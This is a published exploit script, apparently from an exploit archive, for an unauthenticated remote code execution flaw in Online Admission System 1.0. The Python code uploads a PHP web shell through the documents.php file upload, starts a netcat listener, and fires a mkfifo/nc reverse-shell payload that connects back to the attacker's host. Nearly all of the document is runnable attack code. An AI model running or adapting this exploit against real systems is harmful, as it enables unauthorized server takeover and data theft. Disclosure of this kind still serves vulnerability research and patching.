Authored by Jeremiasz Pluta

Online Admission System version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)

#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess

print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')

path = '/' #change me if the path to the /oas is in the root directory or another subdir

class Exploit:

  def __init__(self, target_ip, target_port, localhost, localport):
    self.target_ip = target_ip
    self.target_port = target_port
    self.localhost = localhost
    self.localport = localport

  def exploitation(self):
    payload = """<?php system($_GET['cmd']); ?>"""
    payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

    url = 'http://' + target_ip + ':' + target_port + path
    r = requests.Session()

    print('[*] Resolving URL...')
    r1 = r.get(url + 'documents.php')
    time.sleep(3)

    #Upload the payload file
    print('[*] Uploading the webshell payload...')
    files = {
    'fpic': ('cmd.php', payload + 'n', 'application/x-php'),
    'ftndoc': ('', '', 'application/octet-stream'),
    'ftcdoc': ('', '', 'application/octet-stream'),
    'fdmdoc': ('', '', 'application/octet-stream'),
    'ftcdoc': ('', '', 'application/octet-stream'),
    'fdcdoc': ('', '', 'application/octet-stream'),
    'fide': ('', '', 'application/octet-stream'),
    'fsig': ('', '', 'application/octet-stream'),
    }
    data = {'fpicup':'Submit Query'}
    r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
    time.sleep(3)

    print('[*] Setting up netcat listener...')
    listener = subprocess.Popen(["nc", "-nvlp", self.localport])
    time.sleep(3)

    print('[*] Spawning reverse shell...')
    print('[*] Watchout!')
    r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
    time.sleep(3)

    if (r3.status_code == 200):
      print('[*] Got shell!')
      while True:
        listener.wait()
    else:
      print('[-] Something went wrong!')
      listener.terminate()

def get_args():
  parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
  parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
  parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
  parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
  parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
  args = parser.parse_args()
  return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()

RELATED ARTICLESMORE FROM AUTHOR